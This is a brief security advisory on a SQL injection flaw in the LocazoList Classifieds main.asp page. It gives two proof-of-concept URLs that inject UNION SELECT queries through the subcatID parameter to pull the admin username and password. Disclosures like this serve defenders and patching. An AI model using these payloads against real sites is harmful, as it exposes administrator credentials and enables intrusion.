LocazoList Classifieds Main.ASP SQL Injection Vulnerability

LocazoList Classifieds Main.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
http://www.example.com/main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201